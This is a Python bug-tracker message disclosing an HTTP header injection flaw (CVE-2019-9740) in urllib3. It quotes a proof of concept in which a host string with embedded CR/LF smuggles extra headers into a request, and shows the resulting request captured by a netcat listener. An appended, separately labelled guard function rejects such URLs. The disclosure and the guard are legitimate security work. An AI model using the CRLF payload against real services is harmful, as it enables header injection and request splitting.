[issue30458] [security][CVE-2019-9740][CVE-2019-9947] HTTP Header Injection (follow-up of CVE-2016-5699)
STINNER Victor
report at bugs.python.org
Wed Apr 10 08:32:58 EDT 2019
STINNER Victor <vstinner at redhat.com> added the comment:
bpo-36276 has been marked as a duplicate of this issue.
According to the following message, urllib3 is also vulnerable to HTTP Header Injection:
https://bugs.python.org/issue36276#msg337837
Copy of Alvin Chang's msg337837:
"""
I am also seeing the same issue with urllib3

import urllib3

pool_manager = urllib3.PoolManager()

host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
url = "http://" + host + ":8080/test/?test=a"

try:
    info = pool_manager.request('GET', url).info()
    print(info)
except Exception:
    pass

nc -l localhost 7777
GET /?a=1 HTTP/1.1
X-injected: header
TEST: 123:8080/test/?test=a HTTP/1.1
Host: localhost:7777
Accept-Encoding: identity
"""
----------
_______________________________________
Python tracker <report at bugs.python.org>
<https://bugs.python.org/issue30458>
_______________________________________
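
A caller-side guard against the injection shown in the message above, as an added example that is not code from the tracker, CPython or urllib3: it rejects a URL containing raw control characters or spaces before the URL reaches any HTTP client. The names check_url, first_unsafe and UnsafeURLError are hypothetical, and the sample URLs in the demo are constructed from the one quoted in the message.

```python
import re
from urllib.parse import urlsplit

# ASCII control characters (CR and LF included), space and DEL. None of them
# may appear raw in a URL that ends up in an HTTP/1.1 request line.
_UNSAFE = re.compile(r"[\x00-\x20\x7f]")


class UnsafeURLError(ValueError):
    """The URL must not be handed to an HTTP client."""


def first_unsafe(url):
    """Return (offset, char) of the first unsafe character, or None."""
    m = _UNSAFE.search(url)
    return (m.start(), m.group()) if m else None


def check_url(url):
    """Return url unchanged if it is safe to request, else raise."""
    # Check the raw string first: some urlsplit() versions silently drop
    # tab, CR and LF, which would hide the problem from later checks.
    hit = first_unsafe(url)
    if hit:
        raise UnsafeURLError("unsafe character %r at offset %d" % (hit[1], hit[0]))
    try:
        parts = urlsplit(url)
        parts.port  # raises ValueError for a non-numeric or out-of-range port
    except ValueError as exc:
        raise UnsafeURLError("malformed URL: %s" % exc) from None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise UnsafeURLError("expected an absolute http(s) URL")
    return url


if __name__ == "__main__":
    # Constructed inputs: the URL from the message above and a clean one.
    host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123"
    for url in ("http://" + host + ":8080/test/?test=a",
                "http://localhost:8080/test/?test=a"):
        try:
            check_url(url)
            print("ok     ", repr(url))
        except UnsafeURLError as exc:
            print("blocked", exc)
```
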